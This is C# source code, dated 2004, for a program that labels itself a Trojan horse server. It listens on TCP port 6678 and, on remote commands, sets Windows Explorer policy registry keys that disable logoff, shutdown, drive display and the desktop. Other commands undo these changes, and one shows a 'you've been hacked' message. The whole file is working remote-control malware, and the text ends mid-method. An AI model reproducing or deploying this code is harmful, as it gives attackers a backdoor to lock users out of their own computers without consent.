特洛伊木马服务器
//wgscd 2004-12 QQ:153964481
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using Microsoft.Win32;
namespace server
{
/// <summary>
/// Form1 的摘要说明。
/// </summary>
public class Form1 : System.Windows.Forms.Form
{
/// <summary>
/// 必需的设计器变量。
/// </summary>
private System.ComponentModel.Container components = null;
private TcpListener listener;
private string mystr="您好!非常抱歉,您的注册表:";
private RegistryKey rrr=Registry.LocalMachine;
private RegistryKey key1;
public Form1()
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();
{int port =6678;
listener=new TcpListener(port);
listener.Start();
Thread thread=new Thread(new ThreadStart(target));
thread.Start();
}
//
// TODO: 在 InitializeComponent 调用后添加任何构造函数代码
//
}
public void target()
{
Socket socket= listener.AcceptSocket();
while(socket.Connected)
{
byte[] by=new Byte[6];
int i=socket.Receive(by,by.Length,0);
string ss=System.Text.Encoding.ASCII.GetString(by);
//OOOOOOOOOOOOOOOOOOOOOOOOOOO以下是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOO
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jiance")
{
string str="hjc";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
if(ss=="zx1000")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//****************************************************************************
if(ss=="zx0100")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",1);
key1.Close();
mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",1);
key2.Close();
mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if(ss=="zx0100"){
//****************************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zx0010")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//====================================================================
if(ss=="zx0001")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//=========================================================================
//$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
if(ss=="zx1100")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoClose",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoClose",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zx1010")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//**************************************************
if(ss=="zx1001")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDesktop被修改!请将它置为0";
}
catch(Exception ee){MessageBox.Show(ee.Message);}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zx0110")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zx0101")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************
if(ss=="zx0011")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//************************************
if(ss=="zx1110")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//**************************************
if(ss=="zx1101")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//******************************************
if(ss=="zx1011")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zx0111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",12);
key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",12);
key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zx1111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//*********************************************
//OOOOOOOOOOOOOOOOOOOOOOOOOOO以上是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以下是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPPPPP
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1000")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//***********************************************************************
if(ss=="zs0100")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if(ss=="zx0100"){
//********************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zs0010")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//==================================================================
if(ss=="zs0001")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//=========================================================================
if(ss=="zs1100")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1010")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoDrives",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoDrives",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//**************************************************
if(ss=="zs1001")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs0110")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs0101")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************
if(ss=="zs0011")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//************************************
if(ss=="zs1110")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//**************************************
if(ss=="zs1101")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//******************************************
if(ss=="zs1011")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs0111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoDrives",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoDrives",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//********************************************
if(ss=="zs1111")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
key1.SetValue("NoLogOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}//if
//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以上是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPP
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以下是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
if(ss=="jg0000")
{
MessageBox.Show("你被我黑了!");
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
